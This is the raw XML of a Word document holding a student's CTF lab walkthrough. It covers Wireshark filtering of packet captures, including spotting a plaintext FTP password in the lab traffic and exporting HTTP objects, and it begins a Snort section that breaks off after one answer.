    <w:p w14:paraId="215E0D84" w14:textId="77777777" w:rsidR="00001EBC" w:rsidRPr="00384953" w:rsidRDefault="00001EBC" w:rsidP="00103190"/>
    <w:p w14:paraId="7AF32231" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Day 7: Networking : The Grinch Really Did Steal Christmas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C73B9A5" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Walkthrough/solution: Wireshark, Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA5D4EB" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE61D61" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> in filter bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901DC32" w14:textId="6333DE7B" w:rsidR="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57EAF198" wp14:editId="0CA3B79B">
            <wp:extent cx="5163271"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163271" cy="2172003"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="243EC4CA" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2769285B" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083DFBC3" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>Protocal.request.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> show all packets that use a specific method of the protocol given. For example, HTTP allows for both a GET and POST to retrieve and submit data accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF00D01" w14:textId="20A131F8" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6306BA27" wp14:editId="38224CC4">
            <wp:extent cx="4496190" cy="488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496190" cy="4884843"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="302FBCCD" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="326ACB5B" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46083574" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve">Combined </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>http.request.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> == GET and the IP address "10.10.67.199"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F78359" w14:textId="55554AA5" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="441D72B5" wp14:editId="640270D9">
            <wp:extent cx="5731510" cy="1106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p w14:paraId="0976CFDE" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1125A8" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DE65BC" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:r w:rsidRPr="004015BA">
        <w:lastRenderedPageBreak/>
        <w:t>The filter we would use: is "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>tcp.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> == 21” just focus on FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F1D6FC" w14:textId="6311F05B" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6399C97E" wp14:editId="01A09730">
            <wp:extent cx="5731510" cy="17621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r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="423EBF08" wp14:editId="67098C34">
            <wp:extent cx="5731510" cy="12306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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D1346C" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D4F9E3" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69834D75" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve">Open up file pcap2.pcap file, the first packet that on the list is using a SSH protocol. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F7318" w14:textId="5C1DD762" w:rsidR="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FDCBF90" wp14:editId="07B091AF">
            <wp:extent cx="5731510" cy="641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p>
    <w:p w14:paraId="6994BF39" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362F47A5" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDC5C62" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>http.request.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> == GET </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>ip.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> == 10.10.122.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EECA994" w14:textId="196F60D2" w:rsidR="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60E21820" wp14:editId="568447E2">
            <wp:extent cx="4320914" cy="11126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4320914" cy="1112616"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC8413A" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38328D46" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 7,8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06628F99" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve">unzip the file, there is a file named ‘elf_mcskidy_wishlist.txt’. Inside the file, there is a list of wish. One of them is ‘x1 Rubber ducky (to replace Elf </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>McEager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve">)’. there is a file named Operation Artic Storm and the author is Kris </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>Kingle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E2B99E8" w14:textId="7618BBA5" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3DEA9D" wp14:editId="26D7C495">
            <wp:extent cx="4153480" cy="119079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153480" cy="1190791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C46225B" wp14:editId="34FE0D33">
            <wp:extent cx="5731510" cy="1126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r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0103624D" wp14:editId="377B539A">
            <wp:extent cx="3256244" cy="39687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3264588" cy="3978919"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DE39BF5" wp14:editId="74F725DD">
            <wp:extent cx="3419952" cy="165758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419952" cy="1657581"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BC0B09" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665047B5" w14:textId="1143159D" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DBD6E0" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Thought Process/Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49644151" w14:textId="330B0D8A" w:rsidR="00103190" w:rsidRDefault="004015BA" w:rsidP="004015BA">
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve">Firstly, we could download ‘aoc-pcaps.zip’, then unzip it. There are 3 files inside: pcap1.pcap, pcap2.pcap, and pcap3.pcap. we have to open file pcap1.pcap and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> it. As soon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> opens up, there are more than 500 packets in this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>file.We</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> can type the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> on the filter bar. We can search the IP which initiates the connection by looking at the ‘Source’ column. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>Protocal.request.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> show all packets that use a specific method of the protocol given. For example, HTTP allows for both a GET and POST to retrieve and submit data accordingly. Combined </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>http.request.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> == GET and the IP address "10.10.67.199".After that find the following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> and you will find out that 471 seems suspicious because the info column tell us it has ‘/posts/’ in it. ‘reindeer-of-the-week’ kind of an article title. Let's begin analysing "pcap2.pcap". The filter we would use: is "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>tcp.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> == 21” just focus on FTP. Look closer we could see that the password leak is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>plaintext_password_fiasco</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve">. Continuing with the analysis of "pcap2.pcap", If we open up file pcap2.pcap file, the first packet that on the list is using a SSH protocol. Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>http.request.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> == GET </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>ip.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t xml:space="preserve"> == 10.10.122.128. On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004015BA">
        <w:t>, click ‘File’ then go to ‘Export Objects’. Select HTTP and then save. After extracting, you will see multiple files included.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A13441E" w14:textId="77777777" w:rsidR="004015BA" w:rsidRPr="004015BA" w:rsidRDefault="004015BA" w:rsidP="004015BA"/>
    <w:p w14:paraId="4FD02FC1" w14:textId="4B155D57" w:rsidR="00103190" w:rsidRPr="0081607E" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Day 8</w:t>
      </w:r>
      <w:r w:rsidRPr="0081607E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Networking – </w:t>
      </w:r>
      <w:r w:rsidRPr="00103190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>What's Under the Christmas Tree?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C4D3A3" w14:textId="38025D2B" w:rsidR="00103190" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:r w:rsidRPr="002355FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Kali Linux, </w:t>
      </w:r>
      <w:r w:rsidR="005005DF">
        <w:t>Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F7C37F" w14:textId="4DBD0FBD" w:rsidR="00103190" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution/walkthrough</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6911ACAF" w14:textId="233948B1" w:rsidR="005005DF" w:rsidRDefault="005005DF" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A67974" w14:textId="100381B3" w:rsidR="005005DF" w:rsidRDefault="0007236D" w:rsidP="00103190">
      <w:r>
        <w:t>Snort created in 1998.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71936287" w14:textId="7BAF89A7" w:rsidR="0007236D" w:rsidRPr="0007236D" w:rsidRDefault="0007236D" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1840C25B" wp14:editId="21630002">
            <wp:extent cx="5314950" cy="2989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0001" cy="2992427"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FFFE6B" w14:textId="6E0400B9" w:rsidR="00103190" w:rsidRDefault="00103190" w:rsidP="00103190"/>
    <w:p w14:paraId="18A5BE15" w14:textId="77777777" w:rsidR="00ED4BF0" w:rsidRDefault="00ED4BF0" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4775F22F" w14:textId="77777777" w:rsidR="00ED4BF0" w:rsidRDefault="00ED4BF0" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD4D7B8" w14:textId="77777777" w:rsidR="00ED4BF0" w:rsidRDefault="00ED4BF0" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0162E583" w14:textId="77777777" w:rsidR="00ED4BF0" w:rsidRDefault="00ED4BF0" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3534A218" w14:textId="77777777" w:rsidR="00ED4BF0" w:rsidRDefault="00ED4BF0" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
